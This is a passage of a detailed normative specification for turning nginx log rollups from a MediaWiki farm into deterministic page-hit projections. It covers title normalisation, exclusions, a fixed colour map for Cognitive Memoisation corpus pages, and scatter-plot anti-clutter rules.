Scaling mode (must be exactly the declared mode; no auto-rescaling)
Tick placement or gridline intervals (must match declared steps)
Label content, ordering, or truncation (no elision, wrapping, or abbreviation unless explicitly specified)
Margins (must be computed to fit widest label; no extra whitespace added)
Opacity (alpha MUST remain 1.0)

If any component of the toolchain cannot honour these constraints exactly, the projection MUST FAIL EXPLICITLY rather than silently substituting alternative behaviour.

This prohibition applies equally to:

plotting backends
UI renderers
export pipelines
downstream “pretty-print” or “auto-layout” passes.

Authority and Governance

The projections are curator-governed and MUST be reproducible from declared inputs alone.
The assisting system MUST NOT infer, rename, paraphrase, merge, split, or reorder titles beyond the explicit rules stated here.
The assisting system MUST NOT optimise for visual clarity at the expense of semantic correctness.
Any deviation from these invariants MUST be explicitly declared by the human curator with a dated update entry.

Authoritative Inputs

Input A: Hourly rollup TSVs produced by logrollup tooling.
Input B: Corpus bundle manifest (corpus/manifest.tsv).
Input C: Full temporal range present in the rollup set (no truncation).
Input D: When supplied page_list_verify aggregation verification counts (e.g. output.csv)

Rollups Processing Mode Invariants (Normative)

Scope

These invariants govern any downstream processing of the TSV rollups generated by logrollup (e.g., aggregation, graphing, rate calculations, moving averages, anomaly detection). They are independent of nginx log parsing and apply only to the rollups artefacts (.tsv) produced by the generator.

Inputs (Normative)

RP-1 — Rollups artefact set

Processing MUST operate only on TSV files produced by logrollup in accordance with its fixed output schema. Non-conforming TSV files MUST be rejected (or excluded) deterministically.

RP-2 — Time bucket identity is filename authoritative

The bucket time window MUST be derived from the TSV filename, not inferred from file mtime and not inferred from internal row data.

Filename format is normative:

YYYY_MM_DDThh_mmZ-to-YYYY_MM_DDThh_mmZ.tsv

The start timestamp is the left segment; the end timestamp is the right segment.

RP-3 — Bucket duration is purely mathematical

Bucket duration MUST be computed as:

bucket_seconds = epoch(end) - epoch(start)

Bucket duration MUST NOT be assumed to be constant across all files, and MUST NOT be hard-coded (even if the generator typically uses 01:00).

RP-4 — Column schema is authoritative

The first TSV row (header) MUST be used to map column positions. Column order MUST NOT be assumed, except that all required column names MUST exist.

The following columns are normative and MUST exist:

total_bytes
total_hits
server_name
path

All agent/method/status counters MUST be treated as optional only if missing from the header; if present, they MUST be parsed as non-negative integers.

RP-5 — Units and rate conversions are fixed
Rates MUST be computed from total_bytes as follows:
bytes_per_second = total_bytes / bucket_seconds
MiB_per_second = bytes_per_second / (1024 * 1024)

If any other base (e.g., 1000*1000) is used, it MUST be explicitly declared as non-normative.

RP-6 — Path keys are already canonical

The 'path' field MUST be treated as an already-canonical identity key emitted by the generator. Downstream processing MUST NOT re-normalise, rewrite, decode, or canonicalise 'path' (including but not limited to query stripping, title extraction, dash/underscore transforms, or slash collapsing). Any additional canonicalisation would constitute mutation of the generator’s identity projection and is prohibited.

RP-7 — Meta-access paths are first-class

Paths under:

/<root>-meta/<meta_class>/<title>

MUST be retained as distinct from:

/<root>/<title>

and from infrastructure paths (e.g., /<root>-dir/load.php). Meta paths MUST NOT be merged into page paths.

RP-8 — Host separation is first-class

All computations MUST treat 'server_name' as part of the aggregation key. Cross-host merging MUST NOT occur unless explicitly requested, and if it occurs, it MUST be performed as a deliberate secondary operation with an explicit declaration.

Aggregation Semantics (Normative)

RP-9 — Default aggregation key

Unless explicitly overridden, the aggregation key MUST be:

(bucket_start, server_name, path)

RP-10 — Collapsing across paths

If an analysis requires collapsing across paths (e.g., total throughput per host), the collapse MUST be performed by summing only total_bytes (and/or total_hits) over the chosen key-space. Collapsing MUST NOT recompute or “estimate” bytes from hit counts.

RP-11 — Derivable totals are not recomputed

If agent/method/status counters exist, they MAY be used for classification analytics, but total_bytes MUST remain authoritative for bandwidth calculations and MUST NOT be reconstructed from sub-counters.

Moving Average and Plotting (Normative)

RP-12 — MA(3) definition

If a MA(3) overlay is requested, it MUST be computed as a simple trailing moving average over the time-ordered buckets:

MA3[i] = (rate[i] + rate[i-1] + rate[i-2]) / 3

For i < 2, MA3 MUST be undefined (or omitted) rather than padded with fabricated values, unless explicitly instructed otherwise.

RP-13 — Time ordering

Buckets MUST be ordered by bucket_start epoch ascending. Filesystem ordering and lexical ordering are insufficient unless validated by parsing bucket_start from filename.

RP-14 — Missing buckets

If bucket windows are missing (gaps), MA(3) MUST NOT interpolate. It MUST operate on observed bucket series only, and any gaps SHOULD be represented explicitly in the plotted timeline if the plotting system supports it.

RP-15 — Logarithmic axis precondition

If a logarithmic Y-axis is used, zero values MUST be handled deterministically:

either omitted from log-scale plotting, or
mapped via a declared epsilon policy (non-normative unless explicitly stated).

Zero-handling MUST NOT fabricate non-zero traffic.

Integrity (Normative)

RP-16 — Non-negative integers

All parsed counters and total_bytes MUST be non-negative integers. Any negative or non-numeric value MUST trigger a deterministic rejection of that row (or file), as declared by the processing implementation.

RP-17 — Deterministic parse errors

All parse failures MUST be deterministic and reproducible: given the same input TSV set, the same rows/files MUST be rejected, and rejection reasons MUST be auditable (e.g., logged).

Path → Title Extraction

A rollup record contributes to a page only if a title can be extracted by these rules:
- If path matches /pub/<title>, then <title> is the candidate.
- If path matches /pub-dir/index.php?<query>, the title MUST be taken from title=<title>.
- If title= is absent, page=<title> MAY be used.
- Otherwise, the record MUST NOT be treated as a page hit.
URL fragments (#…) MUST be removed prior to extraction.

Title Normalisation

URL decoding MUST occur before all other steps.
Underscores (_) MUST be converted to spaces.
UTF-8 dashes (–, —) MUST be converted to ASCII hyphen (-).
Whitespace runs MUST be collapsed to a single space and trimmed.
After normalisation, the title MUST exactly match a manifest title to remain eligible.
Main Page SHALL be included in projections.
Category:Cognitive Memoisation SHALL be included in projections.

Renamed page/title treatments

Ingore Pages

Ignore the following pages:

DOI-master .* (deleted)
Cognitive Memoisation library (old)

Normalisation Overview

A list of page renames / redirects and mappings that appear within the mediawiki web-farm nginx access logs and rollups.

mediawiki pages

all mediawiki URLs that contain _ can be mapped to page title with a space ( ) substituted for the underscore (_).
URLs may be URL encoded as well.
mediawiki rewrites page to /pub/<title>
mediawiki uses /pub-dir/index.php? parameters to refer to <title>
mediawiki: the normalised resource part of a URL path, or parameter=<title>, edit=<title> etc means the normalised title is the same target page.

curator action

Some former pages had emdash etc.

dash rendering: emdash (–) (or similar UTF8) was replaced with dash (-) (ASCII)

renamed pages - under curation

First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2) (redirected from):
- Cognitive_Memoisation_(CM-2):_A_Human-Governed_Protocol_for_Knowledge_Governance_and_Transport_in_AI_Systems)
Cognitive Memoisation (CM-2) Protocol was formerly:
- Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration
- Let's_Build_a_Ship_-_Cognitive_Memoisation_for_Governing_Knowledge_in_Human_-_AI_Collabortion
- Cognitive_Memoisation_for_Governing_Knowledge_in_Human-AI_Collaboration
- Cognitive_Memoisation_for_Governing_Knowledge_in_Human–AI_Collaboration
- Cognitive_Memoisation_for_Governing_Knowledge_in_Human_-_AI_Collaboration
Authority Inversion: A Structural Failure in Human-AI Systems was formerly:
- Authority_Inversion:_A_Structural_Failure_in_Human–AI_Systems
- Authority_Inversion:_A_Structural_Failure_in_Human-AI_Systems
Journey: Human-Led Convergence in the Articulation of Cognitive Memoisation
- Journey:_Human–Led_Convergence_in_the_Articulation_of_Cognitive_Memoisation (em dash)
Cognitive Memoisation Corpus Map was formerly:
- Cognitive_Memoisation:_corpus_guide
- Cognitive_Memoisation:_corpus_guide'
Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration (CM-1) was formerly:

Context_Is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human–AI_Collaboration

Context_Is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human–AI_Collaborationn

Context_is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human-AI_Collaboration

Context_Is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human-AI_Collaborationn

Context_is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human_-_AI_Collaboration

Context_is_Not_Just_a_Window:_Cognitive_Memoisation_as_a_Context_Architecture_for_Human_–_AI_Collaboration

Progress Without Memory: Cognitive Memoisation as a Knowledge-Engineering Pattern for Stateless LLM Interaction was formerly:

Progress_Without_Memory:_Cognitive_Memoisation_as_a_Knowledge_Engineering_Pattern_for_Stateless_LLM_Interaction

Progress_Without_Memory:_Cognitive_Memoisation_as_a_Knowledge-Engineering_Pattern_for_Stateless_LLM_Interaction

Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation formerly:

Cognitive_Memoisation_and_LLMs:_A_Method_for_Exploratory_Modelling_Before_Formalisation'

Cognitive_Memoisation_and_LLMs:_A_Method_for_Exploratory_Modelling_Before_Formalisation

Cognitive Memoisation: Plain-Language Summary (For Non-Technical Readers)

Cognitive_Memorsation:_Plain-Language_Summary_(For_Non-Technical_Readers)'

What Can Humans Trust LLM AI to Do? has been output in the rollups and verification output.tsv as 'What Can Humans Trust LLM AI to Do' without the ? due to invalid path processing in the Perl code
- the title/publication is to be considered the same as the title without the question mark.

Wiki Farm Canonicalisation (Mandatory)

Each MediaWiki instance in a farm is identified by a (vhost, root) pair.
Each instance exposes paired URL forms:
- /<x>/<Title>
- /<x-dir>/index.php?title=<Title>
For the bound vhost:
- /<x>/ and /<x-dir>/index.php MUST be treated as equivalent roots.
- All page hits MUST be folded to a single canonical resource per title.
Canonical resource key:
- (vhost, canonical_title)

Resource Extraction Order (Mandatory)

URL-decode the request path.
Extract title candidate:
1. If path matches ^/<x>/<title>, extract <title>.
2. If path matches ^/<x-dir>/index.php?<query>:
  1. Use title=<title> if present.
  2. Else MAY use page=<title> if present.
3. Otherwise the record is NOT a page resource.
Canonicalise title:
1. "_" → space
2. UTF-8 dashes (–, —) → "-"
3. Collapse whitespace
4. Trim leading/trailing space
Apply namespace exclusions.
Apply infrastructure exclusions.
Apply canonical folding.
Aggregate.

Infrastructure Exclusions (Mandatory)

Exclude:

/
/robots.txt
Any path containing "sitemap"
Any path containing /resources or /resources/
/<x-dir>/index.php
/<x-dir>/load.php
/<x-dir>/api.php
/<x-dir>/rest.php/v1/search/title

Exclude static resources by extension:

.png .jpg .jpeg .gif .svg .ico .webp

Order of normalisation (mandatory)

The correct algorithm (this is the fix, stated cleanly) This is the only compliant order of operations under these invariants:

Load corpus manifest
Normalise manifest titles → build the canonical key set
Build rename map that maps aliases → manifest keys (not free-form strings)

When the verification output.tsv is available:

Process output.tsv:
normalise raw resource
apply rename map → must resolve to a manifest key
if it doesn’t resolve, it is out of domain

Aggregate strictly by manifest key Project Anything else is non-compliant.

Accumulated human_get time series (projection)

Eligible Resource Set (Corpus Titles)

The eligible title set MUST be derived exclusively from corpus/manifest.tsv.
Column 1 of manifest.tsv is the authoritative MediaWiki page title.
Only titles present in the manifest (after normalisation) are eligible for projection.
Titles present in the manifest MUST be included in the projection domain even if they receive zero hits in the period.
Titles not present in the manifest MUST be excluded even if traffic exists.

Noise and Infrastructure Exclusions

The following MUST be excluded prior to aggregation:
- Special:, Category:, Category talk:, Talk:, User:, User talk:, File:, Template:, Help:, MediaWiki:
- /resources/, /pub-dir/load.php, /pub-dir/api.php, /pub-dir/rest.php
- /robots.txt, /favicon.ico
- sitemap (any case)
- Static resources by extension (.png, .jpg, .jpeg, .gif, .svg, .ico, .webp)

Temporal Aggregation

Hourly buckets MUST be aggregated into daily totals per title.
Accumulated value per title is defined as:
- cum_hits(title, day_n) = Σ daily_hits(title, day_0 … day_n)
Accumulation MUST be monotonic and non-decreasing.

Axis and Scale Invariants

X axis: calendar date from earliest to latest available day.
Major ticks every 7 days.
Minor ticks every day.
Date labels MUST be rotated (oblique) for readability.
Y axis MUST be logarithmic.
Zero or negative values MUST NOT be plotted on the log axis.

Legend Ordering

Legend entries MUST be ordered by descending final accumulated human_get_ok.
Ordering MUST be deterministic and reproducible.

Visual Disambiguation Invariants

Each title MUST be visually distinguishable.
The same colour MAY be reused.
The same line style MAY be reused.
The same (colour + line style) pair MUST NOT be reused.
Markers MAY be omitted or reused but MUST NOT be relied upon as the sole distinguishing feature.

Rendering Constraints

Legend MUST be placed outside the plot area on the right.
Sufficient vertical and horizontal space MUST be reserved to avoid label overlap.
Line width SHOULD be consistent across series to avoid implied importance.

Interpretive Constraint

This projection indicates reader entry and navigation behaviour only.
High lead-in ranking MUST NOT be interpreted as quality, authority, or endorsement.
Ordering reflects accumulated human access, not epistemic priority.

Periodic Regeneration

This projection is intended to be regenerated periodically.
Cross-run comparisons MUST preserve all invariants to allow valid temporal comparison.
Changes in lead-in dominance (e.g. Plain-Language Summary vs. CM-1 foundation paper) are observational signals only and do not alter corpus structure.

Metric Definition

The only signal used is human_get_ok.
non-human classifications MUST NOT be included.
No inference from other status codes or agents is permitted.

Corpus Lead-In Projection: Deterministic Colour Map

This table provides the visual encoding for the core corpus pages. For titles not included in the colour map, use colours at your discretion until a Colour Map entry exists.

Colours are drawn from the Matplotlib tab20 palette.

Line styles are assigned to ensure that no (colour + line-style) pair is reused. Legend ordering is governed separately by accumulated human GET_ok.

Corpus Page Title	Colour Index	Colour (hex)	Line Style
Authority Inversion: A Structural Failure in Human-AI Systems	0	#1f77b4	`-`
Axes of Authority in Stateless Cognitive Systems: Authority Is Not Intelligence	1	#aec7e8	`-`
CM Capability survey invariants	2	#ff7f0e	`-`
CM-master-1.16 (anchored)	3	#ffbb78	`-`
Case Study - When the Human Has to Argue With the Machine	4	#2ca02c	`-`
ChatGPT UI Boundary Friction as a Constraint on Round-Trip Knowledge Engineering	5	#98df8a	`-`
Cognitive Memoisation (CM) Public Statement and Stewardship Model	6	#d62728	`-`
Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration	7	#ff9896	`-`
Cognitive Memoisation Corpus Map	8	#9467bd	`-`
Cognitive Memoisation Is Not Skynet	9	#c5b0d5	`-`
Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation	10	#8c564b	`-`
Cognitive Memoisation: LLM Systems Requirements for Knowledge Round Trip Engineering	11	#c49c94	`-`
Cognitive Memoisation: Plain-Language Summary (For Non-Technical Readers)	12	#e377c2	`-`
Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration	13	#f7b6d2	`-`
Dangling Cognates: Preserving Unresolved Knowledge in Cognitive Memoisation	14	#7f7f7f	`-`
Delegation of Authority to AI Systems: Evidence and Risks	15	#c7c7c7	`-`
Dimensions of Platform Error: Epistemic Retention Failure in Conversational AI Systems	16	#bcbd22	`-`
Durability Without Authority: The Missing Governance Layer in Human-AI Collaboration	17	#dbdb8d	`-`
Episodic Failure Case Study: Tied-in-a-Knot Chess Game	18	#17becf	`-`
Externalised Meaning: Making Knowledge Portable Without Ontologies, Vendors or Memory	19	#9edae5	`-`
First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)	0	#1f77b4	`--`
From UI Failure to Logical Entrapment: A Case Study in Post-Hoc Cognitive Memoisation After Exploratory Session Breakdown	1	#aec7e8	`--`
Governance Failure Axes Taxonomy	2	#ff7f0e	`--`
Governing the Tool That Governs You: A CM-1 Case Study of Authority Inversion in Human-AI Systems	3	#ffbb78	`--`
Identified Governance Failure Axes: for LLM platforms	4	#2ca02c	`--`
Integrity and Semantic Drift in Large Language Model Systems	5	#98df8a	`--`
Journey: Human-Led Convergence in the Articulation of Cognitive Memoisation	6	#d62728	`--`
Looping the Loop with No End in Sight: Circular Reasoning Under Stateless Inference Without Governance	7	#ff9896	`--`
Market Survey: Portability of CM Semantics Across LLM Platforms	8	#9467bd	`--`
Nothing Is Lost: How to Work with AI Without Losing Your Mind	9	#c5b0d5	`--`
Observed Model Stability: Evidence for Drift-Immune Embedded Governance	10	#8c564b	`--`
Post-Hoc CM Recovery Collapse Under UI Boundary Friction: A Negative Result Case Study	11	#c49c94	`--`
Progress Without Memory: Cognitive Memoisation as a Knowledge-Engineering Pattern for Stateless LLM Interaction	12	#e377c2	`--`
Reflexive Development of Cognitive Memoisation: A Round-Trip Cognitive Engineering Case Study	13	#f7b6d2	`--`
Reflexive Development of Cognitive Memoisation: Dangling Cognates as a First-Class Cognitive Construct	14	#7f7f7f	`--`
What Can Humans Trust LLM AI to Do?	15	#c7c7c7	`--`
When Evidence Is Not Enough: An Empirical Study of Authority Inversion and Integrity Failure in Conversational AI	16	#bcbd22	`--`
When Training Overrides Logic: Why Declared Invariants Were Not Enough	17	#dbdb8d	`--`
Why Cognitive Memoisation Is Not Memorization	18	#17becf	`--`
Why Machines Cannot Own Knowledge	19	#9edae5	`--`
XDUMP as a Minimal Recovery Mechanism for Round-Trip Knowledge Engineering Under Governance Situated Inference Loss	0	#1f77b4	`-.`

Corpus Lead-In Projection: Colour-Map Hardening Invariants

This section hardens the visual determinism of the Corpus Lead-In Projection while allowing controlled corpus growth.

Authority

This Colour Map is authoritative for all listed corpus pages.
The assisting system MUST NOT invent, alter, or substitute colours or line styles for listed pages.
Visual encoding is a governed property, not a presentation choice.

Page Labels

Page labels must be normalised and then mapped to human readable titles
Titles must not be duplicated.
Some Titles are mapped due to rename.
- do not show prior name, always show the later name in the projection e.g. Corpus guide -> Corpus Map

Binding Rule

For any page listed in the Deterministic Colour Map table:
- The assigned (colour index, colour hex, line style) pair MUST be used exactly.
- Deviation constitutes a projection violation.

Legend Ordering Separation

Colour assignment and legend ordering are orthogonal.
Legend ordering MUST continue to follow the accumulated human GET_ok invariant.
Colour assignment MUST NOT be influenced by hit counts, rank, or ordering.

New Page Admission Rule

Pages not present in the current Colour Map MUST appear in a projection.
New pages MUST be assigned styles in strict sequence order:
- Iterate line style first, then colour index, exactly as defined in the base palette.
- Previously assigned pairs MUST NOT be reused.
The assisting system MUST NOT reshuffle existing assignments to “make space”.

Provisional Encoding Rule

Visual assignments for newly admitted pages are **provisional** until recorded.
A projection that introduces provisional encodings MUST:
- Emit a warning note in the run metadata, and
- Produce an updated Colour Map table for curator review.

Curator Ratification

Only the human curator may ratify new colour assignments.
Ratification occurs by appending new rows to the Colour Map table with a date stamp.
Once ratified, assignments become binding for all future projections.

Backward Compatibility

Previously generated projections remain valid historical artefacts.
Introduction of new pages MUST NOT retroactively alter the appearance of older projections.

Failure Mode Detection

If a projection requires more unique (colour, line-style) pairs than the declared palette provides:
- The assisting system MUST fail explicitly.
- Silent reuse, substitution, or visual approximation is prohibited.

Rationale (Non-Normative)

This hardening ensures:
- Cross-run visual comparability
- Human recognition of lead-in stability
- Detectable drift when corpus structure changes
Visual determinism is treated as part of epistemic governance, not aesthetics.

daily hits scatter (projections)

purpose:

Produce deterministic, human-meaningful MediaWiki page-level analytics from nginx bucket TSVs,
folding all URL variants to canonical resources and rendering a scatter projection across agents, HTTP methods, and outcomes.

Authority

These invariants are normative.
The assisting system MUST follow them exactly.
Visual encoding is a governed semantic property, not a presentation choice.

Inputs

Bucket TSVs produced by page_hits_bucketfarm_methods.pl
Required columns:
- server_name
- path (or page_category)
- <agent>_<METHOD>_<outcome> numeric bins
Other columns MAY exist and MUST be ignored unless explicitly referenced.

Scope

This scope depends on curator target When the curator is dealing with a corpus then:

Projection MUST bind to exactly ONE nginx virtual host at a time.
Example: publications.arising.com.au
Cross-vhost aggregation is prohibited.

otherwise the curator will want all vhosts included.

Namespace Exclusions (Mandatory)

Exclude titles with case-insensitive prefix:

Special:
Category:
Category talk:
Talk:
User:
User talk:
File:
Template:
Help:
MediaWiki:
Obvious misspellings (e.g. Catgeory:) SHOULD be excluded.

Bad Bot Hits

Bad bot hits MUST be included for any canonical page resource that survives normalisation and exclusion.

Bad bot traffic MUST NOT be excluded solely by agent class; it MAY only be excluded if the request is excluded by namespace or infrastructure rules.

badbot_308 SHALL be treated as badbot_GET_redir for scatter projections.

Human success ordering (HUMAN_200_304) remains the sole ordering metric; inclusion of badbot hits MUST NOT affect ranking.

metadata hits invariants

Within the rollups files the metadata hits are signified by the pattern:
- (/<dir>-meta/<type>/<rem-path>) where type=:
  - version
  - diff
  - docid
  - info
within the output.tsv (page_list_verify output) metadata accumulated hits are signified by:
- .$type/<path> e.g.
  - .version/<path>
  - .diff/<path>
  - .docid/<path>
  - .info/<path>

Projection gating invariant:

When processing accumulation bins for any projection, NO counts from metadata-identified rows SHALL contribute to any human_* bins.
Metadata-identified rows MAY contribute only to: ai_, bot_, curlwget_, badbot_ when agent-attributed, or to metadata_* bins when unattributed.

Aggregation Invariant (Mandatory)

Aggregate across ALL rollup buckets in the selected time span.
GROUP BY canonical resource.
SUM all numeric <agent>_<METHOD>_<outcome> bins.
Each canonical resource MUST appear exactly once.

Metadata Invariants (Mandatory)

metadata access SHALL be identified by the paths: /<dir>-meta/<type>/<rem-path>
metadata SHALL be attributed to the agent class when the agent string is identifiable to: bot, ai, curlwget and badbot, otherwise it shall be attributed to the 'metadata' category bins
metadata SHALL be:
- GROUP BY canonical resource,
- SUM by numeric <agent>_<METHOD>_<outcome> bins,
- and each canonical resource MUST appear exactly once.

Human Success Spine (Mandatory)

Define ordering metric:
- HUMAN_200_304 := human_GET_ok + human_GET_redir
This metric is used ONLY for vertical ordering.

Ranking and Selection

Sort resources by HUMAN_200_304 descending.
Select Top-N resources (default N = 50).
Any non-default N MUST be declared in run metadata.

Rendering Invariants (Scatter Plot)

Scatter Plot — anon/metadata Category Invariants (Normative)

The anon/medata category bucket represents metadata access when a User-Agent cannot be attrributed to a bot. This category exposes trawling by agents masquerading as browsers to look like human traffic. This bucket is a distinct plotted signal, without masking and contaminating human page readership metrics.

anon/metadata (is a derived agent category separated from human) and included in the buckets called metadata_<x>

anon/metadata is a derived plotting category defined as:

All traffic rows metadata_<X> bucket
anon/metadata acts as an anonymous user agent and MUST NOT be used to reclassify requests into human/ai/bot/curlwget.
anon/metadata MUST NOT be inferred from UA strings - it has been determined by the deterministic logrollup prior.

Attributed Agent <dir>-meta metadata

agent metadata shall be attributed to the agent counts in scatter plots

-meta shall not be excluded from agent aggregated counts

Axes

X axis MUST be logarithmic.
X axis MUST include log-paper verticals:
- Major: 10^k #B0C4DE - Light Steel
- Minor: 2..9 × 10^k
Y axis lists canonical resources ordered by HUMAN_200_304.

Baseline Alignment

The resource label baseline MUST align with human GET_ok.
human_GET_ok points MUST NOT have vertical offset from baseline.
Draw faint horizontal baseline guides/graticules for each resource row all the way to the tick marks for the category label.
Graticules must be rendered before plot so plot symbols overlay any crossing lines.

Category Plotting

ALL agent/method/outcome bins present MUST be plotted.
No category elision, suppression, or collapsing is permitted.

Plot symbol anti-clutter Separation

Anti-clutter SHALL be performed in projected pixel space after log(x) mapping.

Definitions

Let P0 be the base projected pixel coordinate of a bin at (x=count, y=row_baseline).
Let r_px be the plot symbol radius in pixels derived from the renderer and symbol size.
Let d_px := 0.75 × r_px be the base anti-clutter step magnitude.
Let overlap_allow_px := 0.75 × r_px be the permitted overlap allowance.
Let min_sep_px := 2×r_px − overlap_allow_px be the minimum permitted center-to-center distance between any two symbols.

Ray Set

Candidate displacements SHALL lie only on fixed radials.
The compliant ray set MUST be fixed and deterministic relative to up=0°, left=270°, right=090°, down=180° (just like compass headings in sailing and aviation):
- Θ := {60°, 120°, 250°, 300°}
No alternative ray set is permitted.
Ray iteration order MUST begin at 60° and proceed clockwise in ascending compass heading order over the set of Θ.

Row Band Constraint

Any displaced symbol MUST remain within the resource row band:
|y_px(candidate) − y_px(row_baseline)| ≤ row_band_px
row_band_px MUST be derived deterministically from the row spacing (e.g. 0.45 row units mapped to pixels).

Placement Algorithm

For each resource row:

Establish human_GET_ok as the anchor at P0 (k=0).
For each remaining bin in deterministic bin-order, attempt placement:
- First try P0 (no displacement).
- If placement at P0 violates min_sep_px with any already placed symbol:
- Attempt placements on radials in ring steps.
Ring placements are defined as:
- P(k, θ) = P0 + k × d_px × u(θ) for integer k ≥ 1 and θ ∈ Θ.
For observed small collision counts (≤5), the maximum ring index SHOULD be limited:
- k_max_default := 1 (i.e. max radial distance ≈ 0.75×r).
If collisions exceed the default bound:
- k_max MAY increase deterministically (e.g. k_max = 2,3,...) until a non-overwriting placement is found.

Chain Expansion (Permissible Escalation)

If no placement is possible within k_max_default, the projector MAY perform chain expansion:

The next candidate positions MAY be generated relative to an already placed symbol Pi:
- P_chain = Pi + d_px × u(θ) for θ ∈ Θ.
Chain expansion MUST be deterministic:
- Always select the earliest-placed conflicting symbol as the chain origin.
- Always iterate Θ in fixed order.
- Always bound the search by a deterministic maximum number of attempts.

Anti-clutter displacement quantisation (Normative)

Baseline definition:
- For each (title/category) row, the baseline y coordinate is the row’s canonical y index.
- Any anti-clutter displacement SHALL NOT be rendered on the baseline.
- Any symbol not rendered exactly on the baseline MUST represent an anti-clutter displacement.

Quantisation:
- Let r be the radius of the HUMAN GET circle symbol in rendered pixel space.
- All anti-clutter displacements MUST be quantised to the nearest 0.75 × r radial increment in rendered pixel space, radially away from the plot position of a symbol they clashed with.
- Baseline symbols MUST have y = y0 exactly (no fractional drift).

Displacement selection:
- Candidate displacements MUST be evaluated in pixel space after x-scale transform (log-x) for overlap testing.
- Once a candidate displacement is selected, the displacement vector magnitude MUST be snapped to the nearest 0.75 × r radial increment (pixel space).
- If snapping would violate the row-band constraint or cause a collision, the renderer MUST advance to the next candidate (next ray / next ring) rather than emit an unsnapped position.

Legibility invariant:
- A viewer MUST be able to infer “anti-clutter occurred” solely from the quantised y offset (i.e. any non-zero multiple of 0.75 × r relative to the baseline).

Ring Saturation and Radial Progression (Normative)

Ring definition:
- Let r be the HUMAN GET circle symbol radius in rendered pixel space.
- Let Δ = 0.75 × r.
- Ring k is defined as the locus of candidate positions at radial distance k × Δ from the baseline symbol position in pixel space.

Clustering rule:
- For a given baseline symbol, anti-clutter displacement candidates SHALL be evaluated ring-by-ring.
- All angular candidates in ring k MUST be evaluated before any candidate in ring k+1 is considered.
- The renderer SHALL NOT progress to ring k+1 unless all angular positions in ring k are either:
  - collision-invalid, or
  - row-band invalid.

Angular order:
- Angular candidates within a ring MUST be evaluated in a deterministic, fixed ordering.
- The angular ordering SHALL remain invariant across renders.

Minimal radial expansion invariant:
- The renderer MUST produce the minimal radial displacement solution that satisfies collision and row-band constraints.
- No symbol may be placed at ring k+1 if a valid position exists in ring k.

Legibility invariant:
- Increasing radial distance MUST correspond strictly to increased clutter pressure.
- A viewer MUST be able to infer that symbols closer to the baseline experienced fewer collision constraints than symbols at outer rings.

Bin Ordering for Determinism

Within each resource row, bins MUST be processed in a deterministic fixed order prior to anti-clutter placement.
A compliant ordering is lexicographic over:
- (count, agent_order, method_order, outcome_order)
The order tables MUST be fixed and normative:
- agent_order := human, metadata, ai, bot, curlwget, badbot
- method_order := GET, POST, PUT, HEAD, OTHER
- outcome_order := ok, redir, client_err, server_err, other/unknown

Layering and Z-Order

Graticules MUST be rendered before plot symbols such that symbols overlay crossing lines.
Plot symbols MUST use deterministic z-ordering:
grid/graticules < baselines < non-anchor symbols < overlays < anchor symbols
human_GET_ok SHALL be rendered as the final layer in its row (highest z-order) when supported by the graphing system.

Two-Panel Label Layout

The projection MAY render category labels in a dedicated label panel (left axis) separate from the plotting panel.
Label width MUST be computed deterministically from measured rendered text extents.
Labels MUST NOT be truncated, abbreviated, or clipped.
Baseline guides MUST be continuous across label and plot panels:
- A faint baseline guide SHALL be drawn in both panels at the same row baseline y.

Run Metadata Declaration

The output MUST declare:
- N (number of resources plotted) and whether it is default Top-N or non-default (ALL).
- Anti-clutter parameters: r_px, d_px, overlap_allow_px, min_sep_px, Θ, k_max_default, and whether chain expansion was invoked.

Collision Test

A placement is compliant iff for every prior placed symbol center Cj:

distance(Ccandidate, Cj) ≥ min_sep_px

Redirect Jitter

human_GET_redir MUST NOT receive any fixed vertical offset.
human_GET_redir MUST be plotted at the same baseline y as human_GET_ok prior to anti-clutter resolution.
Any visual separation between human_GET_redir and other bins MUST be produced only by the Plot symbol anti-clutter Separation rule.
Random jitter is prohibited.

Encoding Invariants

Agent Encoding

Agent encoded by colour.
badbot MUST be red.

Method Encoding

GET → o
POST → ^
PUT → v
HEAD → D
OTHER → .

Outcome Overlay

ok → no overlay
redir → diagonal slash (/)
client_err → x
server_err → x
other/unknown → +

Legend Invariants

Legend MUST be present.
Legend title MUST be exactly: Legend
Legend MUST explain:
- Agent colours
- Method shapes
- Outcome overlays
Legend MUST NOT overlap resource labels.
The legend MUST be labeled as 'legend' only

Legend Presence (Mandatory)

A legend MUST be rendered on every scatter plot output.
The legend title MUST be exactly: Legend
A projection without a legend is non-compliant.

Legend Content (Mandatory; Faithful to Encoding Invariants)

The legend MUST include three components:

Agent/metadata key (colour):
1. human (MUST be #0096FF - Blue )
2. anon/metadata (MUST be #FFA500 - Orange)
3. ai (MUST be #008000 - Green)
4. bot (MUST be #FF69B4 - Hot Pink )
5. curlwget (MUST be #800080 - Purple )
6. badbot (MUST be #FF0000 - Red )
Method key (base shapes):
1. GET → o
2. POST → ^
3. PUT → v
4. HEAD → D
5. OTHER → .
Outcome overlay key:
1. x = error (client_err or server_err)
2. / = redir
3. + = other (other or unknown)
4. none = ok

Legend Placement (Mandatory)

The legend MUST be placed INSIDE the plotting area.
The legend location MUST be bottom-right (axis-anchored):
- loc = lower right
The legend MUST NOT be placed outside the plot area (no RHS external legend).
The legend MUST NOT overlap the y-axis labels (resource labels).
The legend MUST be fully visible and non-clipped in the output image.

Legend Rendering Constraints (Mandatory)

The legend MUST use a frame (boxed) to preserve readability over gridlines/points.
The legend frame SHOULD use partial opacity to avoid obscuring data:
- frame alpha SHOULD be approximately 0.85 (fixed, deterministic).
the metadata category is for metadata access not attributed to: ai, bot, curlwget, and bad-bot (the assumption is human since hits are acquired from the human counts))
Thus legend ordering MUST be deterministic (fixed order):
- Agents: human, metadata, ai, bot, curlwget, badbot
